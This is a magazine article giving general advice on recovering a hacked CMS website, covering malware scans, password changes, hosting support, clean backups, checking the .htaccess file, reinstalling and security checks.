Advertisment

Recuperating From a Hacked Website

author-image
PCQ Bureau
New Update


Advertisment

Sufyan bin Uzayr, Freelance Writer, Graphic Artist, Photographer, www.sufyan.co.nr.

If you have created a website, you have most likely employed a CMS of your choice, and loaded it with themes, extensions and plugins to enhance its functionality. You have so far created articles, images and other content on your website — all to your heart's extent. The cache plugins are in place, you've taken every step possible to ensure that your databases are in order, and your traffic base is expanding as we speak. All in all, you have put together an awesome website — one that will surely make anyone jealous!

Advertisment



However, one fine day, you attempt to visit your site, only to find out that it is not there — or your domain points to some other website full of advertisements and objectionable content. In a moment of panic, you try logging in to your admin back-end, but sadly, the passwords have been changed, or the back-end is no longer accessible.



Yes, you guessed it right — your website has been hacked!



What now? While it does help to have certain security measures in place, at times, malicious hackers can get the better of us. In such scenarios, when your site has been hacked, there are few steps that can be taken to minimize the damage.

Advertisment



To begin with, know that the malicious hackers have already gotten the better of you — and panicking will only make things worse. The ideal approach is to stay calm — websites are surely dear to anyone who has worked on them, but acting in haste will only increase the damage.



Start with a local scan



There are chances that the machine you've been using to administer your website may be infected with a virus or trojan horse. To minimize such risks, perform a full system scan of your computer. Also, though this seems quite basic, ensure that your anti-virus software is updated on a regular basis.

Advertisment



Change passwords



Thereafter, you should change all passwords associated with your website. If, for example, you are running Drupal to administer your site, simply changing Drupal's back-end password won't help. You should also change passwords for cPanel and/or Plesk (or the administrative mechanism provided by your host), FTP, database users, SSH, etc.



Contact your Web host



Unless your web host is really excellent, in most practical cases, your relationship with your web hosting provider will vary on the basis of service that you've purchased — if you are on a VPS, or use a Reseller Plan, chances are your web host will indeed provide you with some assistance, though they aren't really entitled to offer you backups as such, unless it is clearly stated in the ToS. If, however, you are on a shared hosting package (Reseller Package too is shared, technically speaking), your web host's first priority will be to prevent the malware from spreading to other websites on that server. Believe it or not, most hosts will first save their servers, and then worry about you — business is business, after all. However, you should check with your host to ensure that the said attack is really a hacking attempt (it might just be a server issue with your host). Also, many web hosts do keep backups of their clients' data, so they may be able to help you restore your website.





Backup, with caution



If you have been hacked as an outcome of a phishing attempt, the hackers must've surely left backdoors and other loop-holes within your website files — such ploys are tough to locate. Your best bet will be to delete all files and start over, but in certain cases of minor attacks, you can always attempt surgical repair. Also, databases are generally safe to continue — you can export your database using tools such as PHPMyAdmin, and later import the same in a new installation.



Surgical repair



More often than not, surgical repair on a hacked website will not work. However, if you are aware about the type of infection or attack that your website has faced, you can focus on combating that particular attack. For example, if you know that the problem lies within certain PHP files of your CMS, you can look up the documentation to find ways to repair such files.



.htaccess file



If your domain is directing to a malicious website, you can be certain that the hackers have made changes to your .htaccess file. In this case, try to look for suspicious code at the end of the .htaccess file as most (not all) hackers hide the code at the bottom of the file. Also, ensure that the permissions of the file are set to 644.



Re-install and restore



If you are restoring from a backup, ensure that the backup is clean — backups generated by online tools and stored on the same server as your website cannot be termed safe. As a result, backups should always be kept off-site.



Security check



Once you have re-installed your website, to be on the safer side, you can perform a check on its security level using the open source tool OSSEC (http://www.ossec.net/) or Sucuri (http://www.sucuri.net).



After following the above steps, you'll have your website up and running once again. You should, thereafter, make it a point to keep off-site backups and update your website regularly. After all, prevention is better than cure!

Advertisment